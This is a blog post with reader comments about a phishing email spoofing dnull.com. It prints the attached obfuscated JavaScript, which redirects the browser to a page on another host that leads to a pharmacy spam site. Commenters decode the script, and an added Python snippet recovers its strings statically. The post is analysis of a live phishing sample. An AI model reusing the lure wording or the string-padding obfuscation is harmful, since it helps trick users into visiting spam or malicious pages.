dnull.com support to sokol
Dear Customer,
This e-mail was send by dnull.com to notify you that we have temporanly prevented access to your account.
We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.(C) dnull.com
Where it gets interesting is I own dnull.com and it's my server. How stupid can these guys be?
I don't have time to decipher it.
Maybe someone here will take the time.
<script type='text/javascript'>
function mD(){};
this.aB=43719;
mD.prototype = {i : function() {
var w=new Date();this.j='';var x=function(){};
var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
this.v="v";var q=27427;var m=new Date();
iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;
dE='';k="";var qY=function(){};
}};
xO=false;var b=new mD(); yY="";b.i();this.xT='';
</script>
8 comments:
I received the exact same thing. In fact, while trying to research this, I did a google search of the js code, and your blog was the only search result.
Hey,
I work in the IT department at my company, and we've received 4 of these emails so far. Unfortunately I don't know what the JavaScript does either, but the spam email is poorly written, lots of misspellings!
If you google the code, yours is the only site that comes up.
Same thing happened to me. I would really like to know what this JavaScript does...
I think the misspellings are on purpose to stop spam filters from catching it.
It's one of the few junk mails getting past gmail.com spam filters.
I dissected the code just for fun. It goes to a page at mvblaw.com, which redirects to a Canadian Viagra site.
Enjoy.
> Anonymous said...
Please, can you share the code? What tools/techniques are you using to reverse engineer the JavaScript?
Just a quick look at it shows it's downloading something or another from a remote site referenced by the "encoded" part of the script.
Some of the bits are easy to see...
for instance--
'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '')
is just a simple regex replace-- so do the replace yourself... and you get: http://mvblaw.com/z.htm
'lOovcvavtLi5o5n5' is location
'hqrteqfH' is href
The rest is just sorting out the JavaScript to see what each function leads to another and how they interact... I'd do it but my son's birthday is tonight and I need to leave in 2m roughly :P
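The same trick can be done statically for every padded string in the script, so the sample never has to be run. This is an added example, not code from the post or any commenter; SAMPLE is a constructed excerpt of the three `'...'.replace(/[...]/g, '')` expressions quoted above, and the function names are mine.

```python
import re
from typing import List, Optional

# Constructed excerpt of the obfuscated redirect script quoted in the post.
SAMPLE = (
    "var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\\<]/g, '');"
    "var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];"
    "iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;"
)

# Matches the idiom  '<padded>'.replace(/[<class>]/g, '')  as text only;
# nothing here evaluates the script.
PATTERN = re.compile(r"'([^']*)'\.replace\(/\[([^\]]*)\]/g,\s*''\)")


def decode_one(padded: str, char_class: str) -> str:
    """Apply the script's own deletion class to the padded string."""
    return re.sub("[" + char_class + "]", "", padded)


def decode_all(script: str) -> List[str]:
    """Recover every string the script rebuilds with that idiom, in order."""
    return [decode_one(p, c) for p, c in PATTERN.findall(script)]


def find_redirect(script: str) -> Optional[str]:
    """Return the URL when the decoded pieces amount to location.href = URL."""
    pieces = decode_all(script)
    if "location" in pieces and "href" in pieces:
        for piece in pieces:
            if piece.startswith(("http://", "https://")):
                return piece
    return None


if __name__ == "__main__":
    print(decode_all(SAMPLE))       # ['http://mvblaw.com/z.htm', 'location', 'href']
    print(find_redirect(SAMPLE))    # http://mvblaw.com/z.htm
```

The recovered pieces read as `document.location.href = "http://mvblaw.com/z.htm"`, which is the redirect the comments describe.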
There's a good post on StackOverflow.com explaining what's going on w/ the JavaScript.
Some of the hosts appear to be clean (I contacted mvblaw.com and lendermedia.com, where it appears that neither knew about the z.htm), others appear to have more malicious intent (askverniek.com and bonenberger.net).
The method is slightly different, but the outcome is virtually the same as what you wrote about in your other post. In my comment there, I made mention of a comment I wrote here w/ some links for explanation and for complaining.